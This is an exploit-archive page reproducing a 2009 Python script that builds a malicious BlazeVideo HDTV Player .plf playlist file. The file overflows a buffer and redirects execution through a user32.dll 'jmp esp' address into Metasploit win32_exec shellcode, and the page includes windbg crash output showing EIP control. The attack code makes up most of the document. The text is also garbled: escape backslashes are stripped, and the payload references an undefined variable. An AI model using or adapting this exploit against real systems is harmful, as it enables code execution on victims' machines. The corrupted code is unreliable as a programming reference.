BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit
# Published : 2009-02-04
# Author : LiquidWorm
# Previous Title : Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)
# Next Title : Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit

#!/usr/bin/python
#
# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File  Remote Heap Overflow Exploit
#
# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
# Player software, combining HDTV playback, FM receiving, video record and DVD playback
# functions. You can make advantage of PC monitor's high resolution, watch, record, playback
# high definition HDTV program or teletext broadcast program.
#
# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# ------------------------------------windbg------------------------------------
#
# (620.d74): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
# eip=43434343 esp=0013f288 ebp=6405247c iopl=0         nv up ei pl nz ac pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
# 43434343 ??              ???
#
#--------------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# http://www.zeroscience.org/
#
# 03.01.2009
#


print "--------------------------------------------------------------------------"
print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploitn"
print "tttby LiquidWorm [liquidworm[t00t]gmail.com] - 2009n"
print "--------------------------------------------------------------------------"

buffer = "x41" * 260

eip = "xc0x25x49x7e" #jmp esp  user32.dll

nop = "x90" * 15

# win32_exec -  EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com
shellcode = (
	"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
	"x49x49x49x49x49x49x49x49x49x49x49x51x5ax48x6ax65"
	"x58x30x42x31x50x42x41x6bx41x41x75x32x41x42x32x42"
	"x41x30x42x41x41x58x38x41x42x50x75x39x79x6bx4cx4a"
	"x48x47x34x43x30x45x50x57x70x4cx4bx71x55x77x4cx4c"
	"x4bx71x6cx37x75x30x78x75x51x78x6fx4cx4bx52x6fx32"
	"x38x4cx4bx63x6fx45x70x55x51x5ax4bx31x59x6cx4bx44"
	"x74x6cx4bx55x51x4ax4ex76x51x49x50x6dx49x4cx6cx4e"
	"x64x6fx30x30x74x43x37x7ax61x59x5ax36x6dx46x61x6a"
	"x62x58x6bx7ax54x45x6bx76x34x47x54x64x44x53x45x79"
	"x75x4cx4bx63x6fx51x34x67x71x4ax4bx50x66x4cx4bx76"
	"x6cx30x4bx4cx4bx43x6fx67x6cx34x41x58x6bx6ex6bx75"
	"x4cx6cx4bx37x71x38x6bx6cx49x63x6cx54x64x44x44x79"
	"x53x50x31x69x50x63x54x4cx4bx63x70x34x70x4bx35x4f"
	"x30x53x48x56x6cx6ex6bx71x50x76x6cx4cx4bx34x30x45"
	"x4cx4cx6dx4ex6bx50x68x55x58x5ax4bx54x49x4cx4bx6f"
	"x70x4ex50x55x50x63x30x75x50x4cx4bx72x48x55x6cx71"
	"x4fx45x61x39x66x41x70x72x76x4fx79x6bx48x4dx53x4f"
	"x30x73x4bx50x50x50x68x6ax4fx48x4ex6dx30x43x50x62"
	"x48x6fx68x4bx4ex4fx7ax74x4ex46x37x39x6fx69x77x41"
	"x63x50x6fx70x6cx75x50x65"
	)

payload = garbage + eip + nop + shellcode + nop

try:
	out_file = open("Groundhog_Day.plf",'w')
	out_file.write(payload)
	out_file.close()
	raw_input("nn[*] Evil playlist successfully created.nnPress any key to continue...")
except:
	print "Oops!"

# www.Syue.com [2009-02-04]